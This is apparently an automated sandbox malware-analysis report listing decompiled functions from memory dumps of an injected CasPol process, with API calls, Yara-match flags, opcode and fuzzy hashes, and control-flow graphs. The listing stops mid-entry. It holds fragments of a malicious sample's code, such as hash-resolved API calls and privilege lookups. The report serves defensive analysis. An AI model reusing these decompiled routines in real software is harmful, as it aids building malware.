                                                                  0x0041e7b0

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                  • Instruction ID: 1b90bcd36e8a78153eba8f51a40a1fce6fab4eed9a3e5dfa1b1f9faf88a12c54
                                                                  • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                  • Instruction Fuzzy Hash: 13F01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159FE0897241C630F811CBB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E6C3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0041E6C3(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                  0x0041e6da
                                                                  0x0041e6e8
                                                                  0x0041e6ec

                                                                  APIs
                                                                  • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                  • Instruction ID: 9ee9210bb05c48301ec95111c73dbb9c9ea8a797f0d2d2d6377b377fa5d8e709
                                                                  • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                  • Instruction Fuzzy Hash: 5ED01776604218ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C671FA0086E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E6BE Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0041E6BE(void* __edi, void* __esi, intOrPtr _a4, void* _a8) {
				long _t9;

				_t6 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t6, _t6 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}




                                                                  0x0041e6c6
                                                                  0x0041e6da
                                                                  0x0041e6e8
                                                                  0x0041e6ec

                                                                  APIs
                                                                  • NtClose.NTDLL(00410348,00000000,?,00410348,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E6E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                  • Instruction ID: a83627c48fb09607d7489d41a2bc8f9ecd1366b18a2a80a5dfb2e3b4a2810487
                                                                  • Opcode Fuzzy Hash: 6a413986c672f9c4500663bc36cf28119bdd7b8d41ccb101deb52b47a519a9fb
                                                                  • Instruction Fuzzy Hash: F5E08C7A600204ABD610EBA4CC45ED73BA9DF88224F018459BE195B342C270FA008BE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6504ea9ac095ab0c98d2c5fb0b3808906787fb60af23a640be42e77ebd187dec
                                                                  • Instruction ID: bcb3071a78016d8281ce9657f0afd0568acc81b534edf3d7cc38a02aa8074a37
                                                                  • Opcode Fuzzy Hash: 6504ea9ac095ab0c98d2c5fb0b3808906787fb60af23a640be42e77ebd187dec
                                                                  • Instruction Fuzzy Hash: 38900265711000032105A59907045070046A7E5391351C022F1005591CD77188616165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dbb6f62d831cc500803bb3cfbb4995767e788850486236138c32c6b2b8814f14
                                                                  • Instruction ID: 542e96301bd3f292121838ed4eea949f75a7eb344e0f13651ab4f5c2d68b758e
                                                                  • Opcode Fuzzy Hash: dbb6f62d831cc500803bb3cfbb4995767e788850486236138c32c6b2b8814f14
                                                                  • Instruction Fuzzy Hash: D59002B170100403F140719944047460005A7E0341F51C012A5054595EC7A98DD576A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: d206ed980363bf22bc65734ed1f7a8721a218e5a229de62aa263f307d79c2cdc
                                                                  • Instruction ID: 6942c82388e391a4882f019b81113e575fcd2924bcabacfcb11cd38a9dc62ce7
                                                                  • Opcode Fuzzy Hash: d206ed980363bf22bc65734ed1f7a8721a218e5a229de62aa263f307d79c2cdc
                                                                  • Instruction Fuzzy Hash: 4990027170100403F10065D954086460005A7F0341F51D012A5014596EC7B588917175
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014395D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ced2cc4d9ec3333e3e5a026ba9bc2658f2d6a74b6957531ccd497b31d0dd34d5
                                                                  • Instruction ID: 1076649f50b415b94372ed1cf5abe867c075385764d5e45edff227543ac202fe
                                                                  • Opcode Fuzzy Hash: ced2cc4d9ec3333e3e5a026ba9bc2658f2d6a74b6957531ccd497b31d0dd34d5
                                                                  • Instruction Fuzzy Hash: 119002A170200003610571994414616400AA7F0241B51C022E10045D1DC67588917169
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a8dc3bf3842021dbcc2aeafd3874e902f3ad6355ee86f5ab693a2e6a4c5b3dd5
                                                                  • Instruction ID: 8a1cfb0aecb6a3d06861bfc71fcd3239de3bec1d73631a87822a08243bfdab60
                                                                  • Opcode Fuzzy Hash: a8dc3bf3842021dbcc2aeafd3874e902f3ad6355ee86f5ab693a2e6a4c5b3dd5
                                                                  • Instruction Fuzzy Hash: CC90027171114403F110619984047060005A7E1241F51C412A0814599DC7E588917166
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: fd0efeff3a8637d217de14bde4300a29320d419a7d74da02d6aefeb2fff4c071
                                                                  • Instruction ID: 4736bd24955401f04e6688adbf7ab1a19209fe19f5a831b8d47b2abb2555b22f
                                                                  • Opcode Fuzzy Hash: fd0efeff3a8637d217de14bde4300a29320d419a7d74da02d6aefeb2fff4c071
                                                                  • Instruction Fuzzy Hash: A390026971300003F1807199540860A0005A7E1242F91D416A0005599CCA6588696365
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014399A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 732c8d230e47ea61b73d4aa44a32daf83ba688b9ca2c2d1d8585aa65c1f2f05f
                                                                  • Instruction ID: d9d28db6e5bebcdad97240f3708bd2ae6f326eae5cdca4bba19761033b9a6f7f
                                                                  • Opcode Fuzzy Hash: 732c8d230e47ea61b73d4aa44a32daf83ba688b9ca2c2d1d8585aa65c1f2f05f
                                                                  • Instruction Fuzzy Hash: 909002A174100443F10061994414B060005E7F1341F51C016E1054595DC769CC52716A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014397A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: c2df88a5cda0cd87d40df1761df03bcf832aa6b6fa577af9ecbca79802b6047d
                                                                  • Instruction ID: 1e44073100129d8e17cf4fdffa2bb0d07742095c3316c920f0642d12fd2c270a
                                                                  • Opcode Fuzzy Hash: c2df88a5cda0cd87d40df1761df03bcf832aa6b6fa577af9ecbca79802b6047d
                                                                  • Instruction Fuzzy Hash: A590026170100003F140719954186064005F7F1341F51D012E0404595CDA6588566266
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 8feaf524b75337277f016cf895a98b94170cc0c20bc5cdfa7959438e3b84f467
                                                                  • Instruction ID: 542d28fe4224719d600574d0f6d775bfc70ab46344ac2a2725a8f82bfd0023e2
                                                                  • Opcode Fuzzy Hash: 8feaf524b75337277f016cf895a98b94170cc0c20bc5cdfa7959438e3b84f467
                                                                  • Instruction Fuzzy Hash: 89900261742041537545B19944045074006B7F0281791C013A1404991CC6769856E665
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e679f0579a601183031d9e82385cf22ac4598b6483c8490cbfeedc1a4cebd28e
                                                                  • Instruction ID: 8be0018dd03f75ccd8cb63bb13b19ecb93a24f4af59fce89b1fd9400a27e425e
                                                                  • Opcode Fuzzy Hash: e679f0579a601183031d9e82385cf22ac4598b6483c8490cbfeedc1a4cebd28e
                                                                  • Instruction Fuzzy Hash: 0F90026171180043F20065A94C14B070005A7E0343F51C116A0144595CCA6588616565
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ec8476a5a3a863adf360d04e56c3f1792375d48eeab969e7e2b6495ee8f4fd2d
                                                                  • Instruction ID: b84462e09b61973d1e4b25026ec8607118be767cb440c76d69ccdfab6b3af65d
                                                                  • Opcode Fuzzy Hash: ec8476a5a3a863adf360d04e56c3f1792375d48eeab969e7e2b6495ee8f4fd2d
                                                                  • Instruction Fuzzy Hash: F390027170100413F111619945047070009A7E0281F91C413A0414599DD7A68952B165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7e6aa51917ac6adb611c4e055d93114e6753e2abc5b1d10bbe68fabb71a0c2f7
                                                                  • Instruction ID: cb48e0ce96242f2c6a522c74a8e3c849f94995aab145cb8537221fd7bdcf7303
                                                                  • Opcode Fuzzy Hash: 7e6aa51917ac6adb611c4e055d93114e6753e2abc5b1d10bbe68fabb71a0c2f7
                                                                  • Instruction Fuzzy Hash: C490027170100803F1807199440464A0005A7E1341F91C016A0015695DCB658A5977E5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 47884c20772705fd126708e928f83b44c87bf117414d46980b5ac64966ae69cc
                                                                  • Instruction ID: 407a788ad8eb6f5120e531b26e6c00a6bdb692537177b34b5af0949785e92618
                                                                  • Opcode Fuzzy Hash: 47884c20772705fd126708e928f83b44c87bf117414d46980b5ac64966ae69cc
                                                                  • Instruction Fuzzy Hash: 3990027170140403F1006199481470B0005A7E0342F51C012A1154596DC775885175B5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01439A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 35efac4de03ec8dafd67fed378024c901e94ca4d568882148bdbb20739fbc337
                                                                  • Instruction ID: ff86bc298a0ed5c4433f55b3b28c9f2378e6ca0f6a46f6ee84d4030834e9ae8c
                                                                  • Opcode Fuzzy Hash: 35efac4de03ec8dafd67fed378024c901e94ca4d568882148bdbb20739fbc337
                                                                  • Instruction Fuzzy Hash: 52900261B0100043614071A988449064005BBF1251751C122A0988591DC6A9886566A9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014396E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2fc308f1145de23a1add7aa296fc27fb1330d0d668a0c1561679628e83f7fdcf
                                                                  • Instruction ID: ae72cf0aa7f57bd4ab83a8fdfd983fde695153e913697f65670320adf2a16f86
                                                                  • Opcode Fuzzy Hash: 2fc308f1145de23a1add7aa296fc27fb1330d0d668a0c1561679628e83f7fdcf
                                                                  • Instruction Fuzzy Hash: C190027170108803F1106199840474A0005A7E0341F55C412A4414699DC7E588917165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014398F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 81a4a26758f80ad89242d993a933ab9a9819db2280c001c563a2288601ed3609
                                                                  • Instruction ID: 7355a62482555786bf80b1957ec97e8a6e55cfab9678d130eec08c999cbe2429
                                                                  • Opcode Fuzzy Hash: 81a4a26758f80ad89242d993a933ab9a9819db2280c001c563a2288601ed3609
                                                                  • Instruction Fuzzy Hash: 24900261B0100503F10171994404616000AA7E0281F91C023A1014596ECB758992B175
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040990D Relevance: 1.6, APIs: 1, Instructions: 65threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 63%
                                                                  			E0040990D(void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v63;
				char _v64;
				char _v68;
				void* _t13;
				int _t15;
				long _t30;
				int _t33;
				void* _t36;
				void* _t38;
				void* _t43;

				_t43 = __eflags;
				_pop(_t38);
				asm("sbb al, 0x83");
				asm("les edx, [ebp-0x75]");
				_t36 = _t38;
				_v64 = 0;
				E004201D3( &_v63, 0, 0x3f);
				E00420C83( &_v64, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t43, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
				_t33 = _t15;
				if(_t33 != 0) {
					_t30 = _a8;
					_t15 = PostThreadMessageW(_t30, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						_t15 =  *_t33(_t30, 0x8003, _t36 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}













                                                                  0x0040990d
                                                                  0x0040990d
                                                                  0x0040990e
                                                                  0x00409912
                                                                  0x00409914
                                                                  0x00409924
                                                                  0x00409928
                                                                  0x00409933
                                                                  0x00409938
                                                                  0x00409943
                                                                  0x0040995b
                                                                  0x00409960
                                                                  0x00409967
                                                                  0x00409969
                                                                  0x00409976
                                                                  0x0040997a
                                                                  0x0040999e
                                                                  0x0040999e
                                                                  0x0040997a
                                                                  0x004099a6

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
                                                                  • Instruction ID: 20480c24435e97d483933209d4d63d1bd1c3dc92514e9563bbea3aa723060474
                                                                  • Opcode Fuzzy Hash: a45e96f904ba6af220e1e6b5eef84503465f32b7258073bff8e907eb5740a78b
                                                                  • Instruction Fuzzy Hash: 16110C71A4022476EB21A6A1DC83FFF776CDB45B44F14012EFE04BA1C2D6A9690587E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00409913 Relevance: 1.6, APIs: 1, Instructions: 62threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 107 409913-409924 108 40992d-409967 call 420c83 call 40cf93 call 402e93 call 4195b3 107->108 109 409928 call 4201d3 107->109 119 4099a0-4099a6 108->119 120 409969-40997a PostThreadMessageW 108->120 109->108 120->119 121 40997c-40999d call 40c663 120->121 121->119
                                                                  C-Code - Quality: 84%
                                                                  			E00409913(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t13;
				int _t15;
				long _t25;
				int _t27;
				void* _t28;
				void* _t32;

				_t32 = __eflags;
				_v68 = 0;
				E004201D3( &_v67, 0, 0x3f);
				E00420C83( &_v68, 3);
				_t19 = _a4;
				_t13 = E0040CF93(_t32, _a4 + 0x20,  &_v68); // executed
				_t15 = E004195B3(_a4 + 0x20, _t13, 0, 0, E00402E93(0xe49e13e4));
				_t27 = _t15;
				if(_t27 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C663(1, 8, _t19 + 0x39c) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                  0x00409913
                                                                  0x00409924
                                                                  0x00409928
                                                                  0x00409933
                                                                  0x00409938
                                                                  0x00409943
                                                                  0x0040995b
                                                                  0x00409960
                                                                  0x00409967
                                                                  0x00409969
                                                                  0x00409976
                                                                  0x0040997a
                                                                  0x00000000
                                                                  0x0040999e
                                                                  0x0040997a
                                                                  0x004099a6

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                  • Instruction ID: 99f33223a06979dd19497cd07b2eb0eced799e52382c08ed34ba0aba74cfe4fe
                                                                  • Opcode Fuzzy Hash: 88885eb971ee9bf2be674d98dac1b17f9e40f8ae4f2a1e710c07d70908d087d4
                                                                  • Instruction Fuzzy Hash: BB01C871A4031476E721A691DC82FEF376C9B44B44F44012AFE04BA2C2D6A8690586E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0041E9F4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 124 41e9f4-41e9f8 125 41e9c0-41e9f3 call 41f203 124->125 126 41e9fb-41ea1d call 41f203 124->126 129 41ea22-41ea37 LookupPrivilegeValueW 126->129
                                                                  C-Code - Quality: 37%
                                                                  			E0041E9F4(void* __eax, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t13;

				asm("stc");
				asm("out dx, al");
				asm("repne jo 0xffffffc8");
				_push(_t22);
				_t10 = _v0;
				E0041F203( *((intOrPtr*)(_v0 + 0x6d4)), _t10, _t10 + 0xab8,  *((intOrPtr*)(_v0 + 0x6d4)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t13;
			}





                                                                  0x0041e9f6
                                                                  0x0041e9f7
                                                                  0x0041e9f8
                                                                  0x0041ea03
                                                                  0x0041ea06
                                                                  0x0041ea1d
                                                                  0x0041ea33
                                                                  0x0041ea37

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                  • Instruction ID: 37147ff059de123ca1daa7b680345aa8e6bf5e2ed93d8c122108e99bdf0e5716
                                                                  • Opcode Fuzzy Hash: c2a2af4da3d61573988083e7c8cd680a0c473ef2092f5d3e3f7940d19c0fb83d
                                                                  • Instruction Fuzzy Hash: D30169B66002086FDB14EF99DC81EEB37ADAF89354F058159FE0997242C235E8558BF0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004099A7 Relevance: 1.6, APIs: 1, Instructions: 54threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
